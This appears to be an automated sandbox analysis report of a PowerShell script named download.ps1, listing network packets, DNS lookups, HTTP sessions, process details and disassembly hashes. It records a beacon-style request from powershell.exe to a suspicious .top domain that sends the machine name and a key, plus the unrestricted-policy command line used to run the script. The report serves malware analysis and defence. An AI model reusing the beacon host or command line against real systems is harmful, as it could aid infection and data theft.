                                                                                                        Dec 30, 2024 19:15:06.062215090 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.062251091 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.062272072 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.069928885 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.069957972 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.069967985 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.070040941 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.081120014 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.081228971 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.337491989 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.337708950 CET4973080192.168.2.445.61.136.138

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 30, 2024 19:15:03.824774027 CET5807653192.168.2.41.1.1.1
                                                                                                        Dec 30, 2024 19:15:04.218657970 CET53580761.1.1.1192.168.2.4
                                                                                                        Dec 30, 2024 19:15:04.843369007 CET6003853192.168.2.41.1.1.1
                                                                                                        Dec 30, 2024 19:15:04.850259066 CET53600381.1.1.1192.168.2.4

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Dec 30, 2024 19:15:03.824774027 CET192.168.2.41.1.1.10x1c7eStandard query (0)kdemjgebjimkanl.topA (IP address)IN (0x0001)false
                                                                                                        Dec 30, 2024 19:15:04.843369007 CET192.168.2.41.1.1.10x66fcStandard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Dec 30, 2024 19:15:04.218657970 CET1.1.1.1192.168.2.40x1c7eNo error (0)kdemjgebjimkanl.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                        Dec 30, 2024 19:15:04.850259066 CET1.1.1.1192.168.2.40x66fcNo error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • kdemjgebjimkanl.top
                                                                                                        • www.google.com

                                                                                                        HTTP Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.44973045.61.136.138804280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 30, 2024 19:15:04.239268064 CET215OUTGET /67wr8lha3ohtr.php?id=user-PC&key=72208797663&s=527 HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                        Host: kdemjgebjimkanl.top
                                                                                                        Connection: Keep-Alive
                                                                                                        Dec 30, 2024 19:15:04.841994047 CET166INHTTP/1.1 302 Found
                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                        Date: Mon, 30 Dec 2024 18:15:04 GMT
                                                                                                        Content-Length: 0
                                                                                                        Connection: keep-alive
                                                                                                        Location: http://www.google.com


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.449731142.250.185.132804280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 30, 2024 19:15:04.857588053 CET159OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                        Host: www.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        Dec 30, 2024 19:15:05.867115021 CET1236INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 30 Dec 2024 18:15:05 GMT
                                                                                                        Expires: -1
                                                                                                        Cache-Control: private, max-age=0
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-qI2LndbGo3Ewp3Gr5w0Mtw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                        Server: gws
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Set-Cookie: AEC=AZ6Zc-VJ-mrL_8JZtE1LV43yqkyAgGYfuLWq3zoJBqsQPB_48i8JtlcScVM; expires=Sat, 28-Jun-2025 18:15:05 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                        Set-Cookie: NID=520=edUyilLz9NohtKdJgWF7ALA3qLVmu0O0k_puHJrkEuRaEYtXcUopEPe90jpO009cj4MblYOZQGmesoAZ_978npSBG9HajeRlbBrlLG6VjHt_GX3vCGreE64fg-4MZu7kLrJmS0CQerN4O6LF9ZcvhFP2lkrN1Yr9eEeVPfSZIJCFhcYN6y3nRjN9Z9FoNV8jngeTHzV7; expires=Tue, 01-Jul-2025 18:15:05 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                        Accept-Ranges: none
                                                                                                        Vary: Accept-Encoding
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Data Raw: 33 65 34 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20
                                                                                                        Data Ascii: 3e41<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images,
                                                                                                        Dec 30, 2024 19:15:05.867273092 CET1236INData Raw: 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f
                                                                                                        Data Ascii: videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/im
                                                                                                        Dec 30, 2024 19:15:05.867285967 CET1236INData Raw: 32 2c 33 2c 33 2c 31 31 35 38 2c 34 35 39 2c 32 30 34 2c 33 2c 33 30 36 2c 37 38 35 2c 34 2c 34 2c 34 2c 34 2c 35 32 39 2c 31 36 33 2c 38 36 2c 32 2c 32 2c 34 2c 34 33 30 2c 31 38 2c 37 2c 31 2c 38 38 35 2c 34 31 39 2c 33 33 35 2c 32 2c 31 39 38
                                                                                                        Data Ascii: 2,3,3,1158,459,204,3,306,785,4,4,4,4,529,163,86,2,2,4,430,18,7,1,885,419,335,2,198,61,97,272,5,112,488,210,346,919,44,36,90,502,110,161,293,348,93,231,36,1,893,313,2,1,268,32,187,3,273,2,819,101,833,505,22,102,1266,2,259,65,22,1362,5,920,1,681
                                                                                                        Dec 30, 2024 19:15:05.867297888 CET1236INData Raw: 2b 6e 28 63 29 2c 62 2e 73 65 61 72 63 68 28 22 26 6c 65 69 3d 22 29 3d 3d 3d 2d 31 26 26 28 63 3d 70 28 63 29 29 26 26 28 65 2b 3d 22 26 6c 65 69 3d 22 2b 63 29 29 3b 76 61 72 20 66 3d 62 2e 73 65 61 72 63 68 28 22 26 63 73 68 69 64 3d 22 29 3d
                                                                                                        Data Ascii: +n(c),b.search("&lei=")===-1&&(c=p(c))&&(e+="&lei="+c));var f=b.search("&cshid=")===-1&&a!=="slh";c="&zx="+Date.now().toString();g._cshid&&f&&(c+="&cshid="+g._cshid);(d=d())&&(c+="&opi="+d);return"/"+(h||"gen_204")+"?atyp=i&ct="+String(a)+"&ca
                                                                                                        Dec 30, 2024 19:15:05.867309093 CET896INData Raw: 69 6f 6e 28 29 7b 0a 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 75 62 6d 69 74 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3b 69 66 28 61 3d 62
                                                                                                        Data Ascii: ion(){document.documentElement.addEventListener("submit",function(b){var a;if(a=b.target){var c=a.getAttribute("data-submitfalse");a=c==="1"||c==="q"&&!a.elements.q.value?!0:!1}else a=!1;a&&(b.preventDefault(),b.stopPropagation())},!0);docume
                                                                                                        Dec 30, 2024 19:15:05.867321968 CET1236INData Raw: 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 33 38 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 66 6f
                                                                                                        Data Ascii: round-position:0 -138px;background-repeat:repeat-x;border-bottom:1px solid #000;font-size:24px;height:29px;_height:30px;opacity:1;filter:alpha(opacity=100);position:absolute;top:0;width:100%;z-index:990}#gbx3{left:0}#gbx4{right:0}#gbb{position
                                                                                                        Dec 30, 2024 19:15:05.867328882 CET1116INData Raw: 3a 35 70 78 5c 30 2f 3b 62 6f 74 74 6f 6d 3a 34 70 78 5c 30 2f 7d 2e 67 62 6d 61 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a 2d 31 70 78 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 20 64 61 73 68 65 64 20 64
                                                                                                        Data Ascii: :5px\0/;bottom:4px\0/}.gbma{position:relative;top:-1px;border-style:solid dashed dashed;border-color:transparent;border-top-color:#c0c0c0;display:-moz-inline-box;display:inline-block;font-size:0;height:0;line-height:0;width:0;border-width:3px
                                                                                                        Dec 30, 2024 19:15:05.867336035 CET1236INData Raw: 64 69 6e 67 2d 74 6f 70 3a 32 70 78 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62
                                                                                                        Data Ascii: ding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0
                                                                                                        Dec 30, 2024 19:15:05.867350101 CET1236INData Raw: 7d 23 67 62 6d 70 69 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 30 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68
                                                                                                        Data Ascii: }#gbmpid{background-position:0 0}#gbmpi,#gbmpid{border:none;display:inline-block;height:48px;width:48px}#gbmpiw{display:inline-block;line-height:9px;padding-left:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gb
                                                                                                        Dec 30, 2024 19:15:05.867362976 CET1236INData Raw: 6c 62 2d 68 76 72 2c 2e 67 62 6d 6c 62 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 6c 62 77 7b 63 6f 6c 6f
                                                                                                        Data Ascii: lb-hvr,.gbmlb:focus{outline:none;text-decoration:underline !important}.gbmlbw{color:#ccc;margin:0 10px}.gbmt{padding:0 20px}.gbmt:hover,.gbmt:focus{background:#eee;cursor:pointer;outline:0 solid black;text-decoration:none !important}.gbm0l,.gb
                                                                                                        Dec 30, 2024 19:15:05.872227907 CET1236INData Raw: 78 7d 2e 67 62 70 63 20 2e 67 62 70 73 7b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 70 63 20 2e 67 62 70 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 7d 2e 67 62 70 64 20 2e 67 62 6d
                                                                                                        Data Ascii: x}.gbpc .gbps{color:#000;font-weight:bold}.gbpc .gbpd{margin-bottom:5px}.gbpd .gbmt,.gbpd .gbps{color:#666 !important}.gbpd .gbmt{opacity:.4;filter:alpha(opacity=40)}.gbps2{color:#666;display:block}.gbp0{display:none}.gbp0 .gbps2{font-weight:b


                                                                                                        Statistics

                                                                                                        CPU Usage

                                                                                                        Click to jump to process

                                                                                                        Memory Usage

                                                                                                        Click to jump to process

                                                                                                        High Level Behavior Distribution

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Target ID:0
                                                                                                        Start time:13:14:57
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                        Imagebase:0x7ff788560000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:1
                                                                                                        Start time:13:14:57
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Disassembly

                                                                                                        Reset < >

                                                                                                          Executed Functions

                                                                                                          Function 00007FFD9BAC7F66 Relevance: .5, Instructions: 471COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4bfdb05308c08d3bfc288b46e0f021fede1d5685c208f1d4b5073e6b1ad43726
                                                                                                          • Instruction ID: f3ed4b759875405c329ff830a7b5490eeca4dbbe6410df64555fcbda0d682e2b
                                                                                                          • Opcode Fuzzy Hash: 4bfdb05308c08d3bfc288b46e0f021fede1d5685c208f1d4b5073e6b1ad43726
                                                                                                          • Instruction Fuzzy Hash: 43F19230A09A4E8FEBA8EF28C8557F937D1FF54310F14426EE85DC7295CB74A9458B82
                                                                                                          Function 00007FFD9BAC8D12 Relevance: .5, Instructions: 456COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c6ab04dbc1d60719540281645d01f7d4e6c0a5c67bbf5c2430c9272273e5e580
                                                                                                          • Instruction ID: 04d0d06345641fa7968ff77f012a692b2b48e8f9968b4e16fb7f1c78feaf1ee3
                                                                                                          • Opcode Fuzzy Hash: c6ab04dbc1d60719540281645d01f7d4e6c0a5c67bbf5c2430c9272273e5e580
                                                                                                          • Instruction Fuzzy Hash: 37E1B330A09A4E8FEBA8EF28C8557F977D1FF54310F14426AE84DC72A5CF74A9458B81
                                                                                                          Function 00007FFD9BD24E7A Relevance: 4.5, Strings: 3, Instructions: 788COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1802258265.00007FFD9BD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bd20000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 7e:$ 7e:$(7e:
                                                                                                          • API String ID: 0-2242143580
                                                                                                          • Opcode ID: 8961ba90dfd8fd9c07f068b809347af9405fd221418760ade141c26e01f49a3f
                                                                                                          • Instruction ID: 8ee98fe2b40805b5a8f5eab32b61aa9a8a58a5f5f8c664a69ad0a5114d8bef0a
                                                                                                          • Opcode Fuzzy Hash: 8961ba90dfd8fd9c07f068b809347af9405fd221418760ade141c26e01f49a3f
                                                                                                          • Instruction Fuzzy Hash: FA322832B0EACA0FE7AE976848659B47BD1EF96214B0911FFD44EC71E3DD19AC068341
                                                                                                          Function 00007FFD9BAB5875 Relevance: .6, Instructions: 610COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b2cbf2f829555313f5ca119b79540fa6134ecc6cced28fcbdef589c3c6dadafa
                                                                                                          • Instruction ID: aa6320e8d88b39eab1c7d30d97c431ca5c29b41c4a8cf03c9e87c77d8cfbceca
                                                                                                          • Opcode Fuzzy Hash: b2cbf2f829555313f5ca119b79540fa6134ecc6cced28fcbdef589c3c6dadafa
                                                                                                          • Instruction Fuzzy Hash: 1C122930A08A5D4FDB98DF5CC8A5AA977E1FF59310F1502BAD059C72A6CA74FC42CB80
                                                                                                          Function 00007FFD9BAB9985 Relevance: .6, Instructions: 597COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6737ce72e466b329482116e49b45e4eedd03649d29faa03ff417f3725f7f882f
                                                                                                          • Instruction ID: 612d73f7181e9904af7f09cbdece4186180b4e14057bbc3857c98ac7db205ca7
                                                                                                          • Opcode Fuzzy Hash: 6737ce72e466b329482116e49b45e4eedd03649d29faa03ff417f3725f7f882f
                                                                                                          • Instruction Fuzzy Hash: FD12B330A18A4D8FDF98DF5CC4A5AB977E1FFA8310F15416DE459C72A6CA74E881CB80
                                                                                                          Function 00007FFD9BAB6E75 Relevance: .6, Instructions: 594COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f3f859d9efc7e6be65f88778e47e69194faedfcf3e351b856e9c368114968c0e
                                                                                                          • Instruction ID: ee5c88687af1d1b55875f51291d88ff76c940f5874441402f621a31900266f70
                                                                                                          • Opcode Fuzzy Hash: f3f859d9efc7e6be65f88778e47e69194faedfcf3e351b856e9c368114968c0e
                                                                                                          • Instruction Fuzzy Hash: 2412F531A08A4D8FDB98DF5CC495AA977F1FFA8310F14416EE459C72A6DA74EC42CB80
                                                                                                          Function 00007FFD9BAC8926 Relevance: .3, Instructions: 330COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1d739eeb36cdd4102f8dada502ab01d3f9ecdf80415509da4e674fe1bb621c8a
                                                                                                          • Instruction ID: e729db0868cc836d07c55142074789fc54440c8f7a297525b60e47675c3b0580
                                                                                                          • Opcode Fuzzy Hash: 1d739eeb36cdd4102f8dada502ab01d3f9ecdf80415509da4e674fe1bb621c8a
                                                                                                          • Instruction Fuzzy Hash: 2EB1C570A0DA4D4FEBA8EF28C8557F93BD1FF55310F14426AE84DC7292CA74A945CB82
                                                                                                          Function 00007FFD9BD251D1 Relevance: .3, Instructions: 264COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1802258265.00007FFD9BD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bd20000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ef3a952701bf4147ab6a72dd8a45e1770e63bab073297be63f39e36c14944951
                                                                                                          • Instruction ID: d703b0c6ad8b637224302e1a63b96060fbef7a555a7a55eed0810676481cfde3
                                                                                                          • Opcode Fuzzy Hash: ef3a952701bf4147ab6a72dd8a45e1770e63bab073297be63f39e36c14944951
                                                                                                          • Instruction Fuzzy Hash: F8812832A0EECA0FE7A9DB6848659747BE1EF65214B5911FED04DC71E3DE64AC06C340
                                                                                                          Function 00007FFD9BAC2A60 Relevance: .2, Instructions: 250COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e278b5606563dba92a0c12f371774f435749486be41539187a15339232dd8021
                                                                                                          • Instruction ID: f9c09b8b89342b7c26eac0e9fc24f4b8431fef77e2b6236b4ec0fdbb2a25c60a
                                                                                                          • Opcode Fuzzy Hash: e278b5606563dba92a0c12f371774f435749486be41539187a15339232dd8021
                                                                                                          • Instruction Fuzzy Hash: B0115A7590E7C98FD7179B744C290A47FB0AE23200B0A01DBD488CB0F3D9685908C7A2
                                                                                                          Function 00007FFD9BAC26F7 Relevance: .2, Instructions: 223COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 89dbd73cb12d68b65bcfed516c3e30bb367247e192cf7e8d3bc89b5c71d2e508
                                                                                                          • Instruction ID: 8c873a7ce2ccf2eb8327261b465cd580291c9b331c9724425435674b35164489
                                                                                                          • Opcode Fuzzy Hash: 89dbd73cb12d68b65bcfed516c3e30bb367247e192cf7e8d3bc89b5c71d2e508
                                                                                                          • Instruction Fuzzy Hash: AAF0B47551DA8DCFCB61EF6884245F87FE0EF29300B0501EBE44DC7171DA60A914CB81
                                                                                                          Function 00007FFD9B99E620 Relevance: .1, Instructions: 125COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1797788194.00007FFD9B99D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B99D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b99d000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9591aef017088f6a165ba9dda5957594e6beffcb98751d515038e43fe26947ef
                                                                                                          • Instruction ID: 80e4312a81442fd4ffe04a75500bce26ac870df64f87655966e3c82f77f48ce3
                                                                                                          • Opcode Fuzzy Hash: 9591aef017088f6a165ba9dda5957594e6beffcb98751d515038e43fe26947ef
                                                                                                          • Instruction Fuzzy Hash: 64413B7140EFC45FE7569B39D8559523FF0EF52320B1605DFD088CB1A3D625A84AC792
                                                                                                          Function 00007FFD9BAC238A Relevance: .1, Instructions: 122COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 729bb2aaabdc4a475307f03191e752cf9c327bf6a517465ba67880b6e4129057
                                                                                                          • Instruction ID: 1a9cb0b546030f1afdbd175b441b3e154177a926342a2ecbb81d007149c8ff48
                                                                                                          • Opcode Fuzzy Hash: 729bb2aaabdc4a475307f03191e752cf9c327bf6a517465ba67880b6e4129057
                                                                                                          • Instruction Fuzzy Hash: E131C53091CB4C9FDB18DB5C980A6A9BBE0FB99711F00426FE449D3251DB706855CBC2
                                                                                                          Function 00007FFD9BAC2DC8 Relevance: .1, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bab0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3d0dea4c244ce05f60b5854d92d4a5318b66eb346c82c7a56b8d9f754c86f2aa
                                                                                                          • Instruction ID: 2f84f7c0e47edb575f2f887f221245b6f09a7abfc9cc02a6ca5f32db01b86320
                                                                                                          • Opcode Fuzzy Hash: 3d0dea4c244ce05f60b5854d92d4a5318b66eb346c82c7a56b8d9f754c86f2aa
                                                                                                          • Instruction Fuzzy Hash: 0B210A3090CB4C4FEB59DF9C984A7E97BE0EB95321F04426FD449C3152D774645ACB92
                                                                                                          Function 00007FFD9BAC8424 Relevance: .1, Instructions: 92COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1798304884.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
